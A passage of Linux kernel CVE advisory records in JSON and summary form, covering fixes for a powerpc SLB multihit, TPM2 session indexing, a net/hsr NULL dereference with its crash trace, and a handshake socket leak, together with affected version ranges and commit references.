"lessThan": "b13a3dbfa196af68eae2031f209743735ad416bf",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
},
{
"lessThan": "895123c309a34d2cfccf7812b41e17261a3a6f37",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
},
{
"lessThan": "4ae1e46d8a290319f33f71a2710a1382ba5431e8",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
},
{
"lessThan": "00312419f0863964625d6dcda8183f96849412c6",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/powerpc/include/asm/book3s/64/mmu-hash.h",
"arch/powerpc/kernel/process.c",
"arch/powerpc/mm/book3s64/internal.h",
"arch/powerpc/mm/book3s64/mmu_context.c",
"arch/powerpc/mm/book3s64/slb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s/slb: Fix SLB multihit issue during SLB preload\n\nOn systems using the hash MMU, there is a software SLB preload cache that\nmirrors the entries loaded into the hardware SLB buffer. This preload\ncache is subject to periodic eviction \u2014 typically after every 256 context\nswitches \u2014 to remove old entry.\n\nTo optimize performance, the kernel skips switch_mmu_context() in\nswitch_mm_irqs_off() when the prev and next mm_struct are the same.\nHowever, on hash MMU systems, this can lead to inconsistencies between\nthe hardware SLB and the software preload cache.\n\nIf an SLB entry for a process is evicted from the software cache on one\nCPU, and the same process later runs on another CPU without executing\nswitch_mmu_context(), the hardware SLB may retain stale entries. If the\nkernel then attempts to reload that entry, it can trigger an SLB\nmulti-hit error.\n\nThe following timeline shows how stale SLB entries are created and can\ncause a multi-hit error when a process moves between CPUs without a\nMMU context switch.\n\nCPU 0 CPU 1\n----- -----\nProcess P\nexec swapper/1\n load_elf_binary\n begin_new_exc\n activate_mm\n switch_mm_irqs_off\n switch_mmu_context\n switch_slb\n /*\n * This invalidates all\n * the entries in the HW\n * and setup the new HW\n * SLB entries as per the\n * preload cache.\n */\ncontext_switch\nsched_migrate_task migrates process P to cpu-1\n\nProcess swapper/0 context switch (to process P)\n(uses mm_struct of Process P) switch_mm_irqs_off()\n switch_slb\n load_slb++\n /*\n * load_slb becomes 0 here\n * and we evict an entry from\n * the preload cache with\n * preload_age(). We still\n * keep HW SLB and preload\n * cache in sync, that is\n * because all HW SLB entries\n * anyways gets evicted in\n * switch_slb during SLBIA.\n * We then only add those\n * entries back in HW SLB,\n * which are currently\n * present in preload_cache\n * (after eviction).\n */\n load_elf_binary continues...\n setup_new_exec()\n slb_setup_new_exec()\n\n sched_switch event\n sched_migrate_task migrates\n process P to cpu-0\n\ncontext_switch from swapper/0 to Process P\n switch_mm_irqs_off()\n /*\n * Since both prev and next mm struct are same we don\u0027t call\n * switch_mmu_context(). This will cause the HW SLB and SW preload\n * cache to go out of sync in preload_new_slb_context. Because there\n * was an SLB entry which was evicted from both HW and preload cache\n * on cpu-1. Now later in preload_new_slb_context(), when we will try\n * to add the same preload entry again, we will add this to the SW\n * preload cache and then will add it to the HW SLB. Since on cpu-0\n * this entry was never invalidated, hence adding this entry to the HW\n * SLB will cause a SLB multi-hit error.\n */\nload_elf_binary cont\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:39.722Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/01324c0328181b94cf390bda22ff91c75126ea57"
},
{
"url": "https://git.kernel.org/stable/c/2e9a95d60f1df7b57618fd5ef057aef331575bd2"
},
{
"url": "https://git.kernel.org/stable/c/c9f865022a1823d814032a09906e91e4701a35fc"
},
{
"url": "https://git.kernel.org/stable/c/b13a3dbfa196af68eae2031f209743735ad416bf"
},
{
"url": "https://git.kernel.org/stable/c/895123c309a34d2cfccf7812b41e17261a3a6f37"
},
{
"url": "https://git.kernel.org/stable/c/4ae1e46d8a290319f33f71a2710a1382ba5431e8"
},
{
"url": "https://git.kernel.org/stable/c/00312419f0863964625d6dcda8183f96849412c6"
}
],
"title": "powerpc/64s/slb: Fix SLB multihit issue during SLB preload",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71078",
"datePublished": "2026-01-13T15:34:43.437Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-19T12:19:39.722Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68792 (GCVE-0-2025-68792)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-17 15:37
VLAI?
EPSS
Title
tpm2-sessions: Fix out of range indexing in name_size
Summary
In the Linux kernel, the following vulnerability has been resolved:
tpm2-sessions: Fix out of range indexing in name_size
'name_size' does not have any range checks, and it just directly indexes
with TPM_ALG_ID, which could lead into memory corruption at worst.
Address the issue by only processing known values and returning -EINVAL for
unrecognized values.
Make also 'tpm_buf_append_name' and 'tpm_buf_fill_hmac_session' fallible so
that errors are detected before causing any spurious TPM traffic.
End also the authorization session on failure in both of the functions, as
the session state would be then by definition corrupted.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
1085b8276bb4239daa7008f0dcd5c973e4bd690f , < 47e676ce4d68f461dfcab906f6aeb254f7276deb
(git)
Affected: 1085b8276bb4239daa7008f0dcd5c973e4bd690f , < 04a3aa6e8c5f878cc51a8a1c90b6d3c54079bc43 (git) Affected: 1085b8276bb4239daa7008f0dcd5c973e4bd690f , < 6e9722e9a7bfe1bbad649937c811076acf86e1fd (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/char/tpm/tpm2-cmd.c",
"drivers/char/tpm/tpm2-sessions.c",
"include/linux/tpm.h",
"security/keys/trusted-keys/trusted_tpm2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "47e676ce4d68f461dfcab906f6aeb254f7276deb",
"status": "affected",
"version": "1085b8276bb4239daa7008f0dcd5c973e4bd690f",
"versionType": "git"
},
{
"lessThan": "04a3aa6e8c5f878cc51a8a1c90b6d3c54079bc43",
"status": "affected",
"version": "1085b8276bb4239daa7008f0dcd5c973e4bd690f",
"versionType": "git"
},
{
"lessThan": "6e9722e9a7bfe1bbad649937c811076acf86e1fd",
"status": "affected",
"version": "1085b8276bb4239daa7008f0dcd5c973e4bd690f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/char/tpm/tpm2-cmd.c",
"drivers/char/tpm/tpm2-sessions.c",
"include/linux/tpm.h",
"security/keys/trusted-keys/trusted_tpm2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.10"
},
{
"lessThan": "6.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.66",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.66",
"versionStartIncluding": "6.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm2-sessions: Fix out of range indexing in name_size\n\n\u0027name_size\u0027 does not have any range checks, and it just directly indexes\nwith TPM_ALG_ID, which could lead into memory corruption at worst.\n\nAddress the issue by only processing known values and returning -EINVAL for\nunrecognized values.\n\nMake also \u0027tpm_buf_append_name\u0027 and \u0027tpm_buf_fill_hmac_session\u0027 fallible so\nthat errors are detected before causing any spurious TPM traffic.\n\nEnd also the authorization session on failure in both of the functions, as\nthe session state would be then by definition corrupted."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-17T15:37:55.698Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/47e676ce4d68f461dfcab906f6aeb254f7276deb"
},
{
"url": "https://git.kernel.org/stable/c/04a3aa6e8c5f878cc51a8a1c90b6d3c54079bc43"
},
{
"url": "https://git.kernel.org/stable/c/6e9722e9a7bfe1bbad649937c811076acf86e1fd"
}
],
"title": "tpm2-sessions: Fix out of range indexing in name_size",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68792",
"datePublished": "2026-01-13T15:29:04.226Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-17T15:37:55.698Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68776 (GCVE-0-2025-68776)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
VLAI?
EPSS
Title
net/hsr: fix NULL pointer dereference in prp_get_untagged_frame()
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/hsr: fix NULL pointer dereference in prp_get_untagged_frame()
prp_get_untagged_frame() calls __pskb_copy() to create frame->skb_std
but doesn't check if the allocation failed. If __pskb_copy() returns
NULL, skb_clone() is called with a NULL pointer, causing a crash:
Oops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI
KASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]
CPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
RIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041
Code: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 <43> 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c
RSP: 0018:ffffc9000d00f200 EFLAGS: 00010207
RAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480
RDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000
RBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee
R10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000
R13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00
FS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0
Call Trace:
<TASK>
hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]
hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741
hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84
__netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966
__netif_receive_skb_one_core net/core/dev.c:6077 [inline]
__netif_receive_skb+0x72/0x380 net/core/dev.c:6192
netif_receive_skb_internal net/core/dev.c:6278 [inline]
netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337
tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485
tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953
tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999
new_sync_write fs/read_write.c:593 [inline]
vfs_write+0x5c9/0xb30 fs/read_write.c:686
ksys_write+0x145/0x250 fs/read_write.c:738
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f0449f8e1ff
Code: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48
RSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001
RAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff
RDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8
RBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000
R10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001
R13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003
</TASK>
Add a NULL check immediately after __pskb_copy() to handle allocation
failures gracefully.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
f266a683a4804dc499efc6c2206ef68efed029d0 , < 3ce95a57d8a1f0e20b637cdeddaaed81831ca819
(git)
Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < c851e43b88b40bb7c20176c51cbf4f8c8d960dd9 (git) Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < 7be6d25f4d974e44918ba3a5d58ebb9d36879087 (git) Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < 8f289fa12926aae44347ca7d490e216555d8f255 (git) Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < 1742974c24a9c1f1fd2e5edca0cbaccb720b397a (git) Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < 6220d38a08f8837575cd8f830928b49a3a5a5095 (git) Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < 188e0fa5a679570ea35474575e724d8211423d17 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/hsr/hsr_forward.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3ce95a57d8a1f0e20b637cdeddaaed81831ca819",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "c851e43b88b40bb7c20176c51cbf4f8c8d960dd9",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "7be6d25f4d974e44918ba3a5d58ebb9d36879087",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "8f289fa12926aae44347ca7d490e216555d8f255",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "1742974c24a9c1f1fd2e5edca0cbaccb720b397a",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "6220d38a08f8837575cd8f830928b49a3a5a5095",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "188e0fa5a679570ea35474575e724d8211423d17",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/hsr/hsr_forward.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.17"
},
{
"lessThan": "3.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/hsr: fix NULL pointer dereference in prp_get_untagged_frame()\n\nprp_get_untagged_frame() calls __pskb_copy() to create frame-\u003eskb_std\nbut doesn\u0027t check if the allocation failed. If __pskb_copy() returns\nNULL, skb_clone() is called with a NULL pointer, causing a crash:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]\nCPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041\nCode: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 \u003c43\u003e 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c\nRSP: 0018:ffffc9000d00f200 EFLAGS: 00010207\nRAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480\nRDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000\nRBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee\nR10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000\nR13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00\nFS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]\n hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741\n hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84\n __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966\n __netif_receive_skb_one_core net/core/dev.c:6077 [inline]\n __netif_receive_skb+0x72/0x380 net/core/dev.c:6192\n netif_receive_skb_internal net/core/dev.c:6278 [inline]\n netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337\n tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485\n tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953\n tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x5c9/0xb30 fs/read_write.c:686\n ksys_write+0x145/0x250 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f0449f8e1ff\nCode: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48\nRSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff\nRDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8\nRBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000\nR10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001\nR13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003\n \u003c/TASK\u003e\n\nAdd a NULL check immediately after __pskb_copy() to handle allocation\nfailures gracefully."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:56.073Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3ce95a57d8a1f0e20b637cdeddaaed81831ca819"
},
{
"url": "https://git.kernel.org/stable/c/c851e43b88b40bb7c20176c51cbf4f8c8d960dd9"
},
{
"url": "https://git.kernel.org/stable/c/7be6d25f4d974e44918ba3a5d58ebb9d36879087"
},
{
"url": "https://git.kernel.org/stable/c/8f289fa12926aae44347ca7d490e216555d8f255"
},
{
"url": "https://git.kernel.org/stable/c/1742974c24a9c1f1fd2e5edca0cbaccb720b397a"
},
{
"url": "https://git.kernel.org/stable/c/6220d38a08f8837575cd8f830928b49a3a5a5095"
},
{
"url": "https://git.kernel.org/stable/c/188e0fa5a679570ea35474575e724d8211423d17"
}
],
"title": "net/hsr: fix NULL pointer dereference in prp_get_untagged_frame()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68776",
"datePublished": "2026-01-13T15:28:52.766Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-19T12:18:56.073Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68775 (GCVE-0-2025-68775)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
VLAI?
EPSS
Title
net/handshake: duplicate handshake cancellations leak socket
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/handshake: duplicate handshake cancellations leak socket
When a handshake request is cancelled it is removed from the
handshake_net->hn_requests list, but it is still present in the
handshake_rhashtbl until it is destroyed.
If a second cancellation request arrives for the same handshake request,
then remove_pending() will return false... and assuming
HANDSHAKE_F_REQ_COMPLETED isn't set in req->hr_flags, we'll continue
processing through the out_true label, where we put another reference on
the sock and a refcount underflow occurs.
This can happen for example if a handshake times out - particularly if
the SUNRPC client sends the AUTH_TLS probe to the server but doesn't
follow it up with the ClientHello due to a problem with tlshd. When the
timeout is hit on the server, the server will send a FIN, which triggers
a cancellation request via xs_reset_transport(). When the timeout is
hit on the client, another cancellation request happens via
xs_tls_handshake_sync().
Add a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel
path so duplicate cancels can be detected.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
3b3009ea8abb713b022d94fba95ec270cf6e7eae , < 011ae80c49d9bfa5b4336f8bd387cd25c7593663
(git)
Affected: 3b3009ea8abb713b022d94fba95ec270cf6e7eae , < e1641177e7fb48a0a5a06658d4aab51da6656659 (git) Affected: 3b3009ea8abb713b022d94fba95ec270cf6e7eae , < 3c330f1dee3cd92b57e19b9d21dc8ce5970b09be (git) Affected: 3b3009ea8abb713b022d94fba95ec270cf6e7eae , < 15564bd67e2975002f2a8e9defee33e321d3183f (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/handshake/request.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "011ae80c49d9bfa5b4336f8bd387cd25c7593663",
"status": "affected",
"version": "3b3009ea8abb713b022d94fba95ec270cf6e7eae",
"versionType": "git"
},
{
"lessThan": "e1641177e7fb48a0a5a06658d4aab51da6656659",
"status": "affected",
"version": "3b3009ea8abb713b022d94fba95ec270cf6e7eae",
"versionType": "git"
},
{
"lessThan": "3c330f1dee3cd92b57e19b9d21dc8ce5970b09be",
"status": "affected",
"version": "3b3009ea8abb713b022d94fba95ec270cf6e7eae",
"versionType": "git"
},
{
"lessThan": "15564bd67e2975002f2a8e9defee33e321d3183f",
"status": "affected",
"version": "3b3009ea8abb713b022d94fba95ec270cf6e7eae",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/handshake/request.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
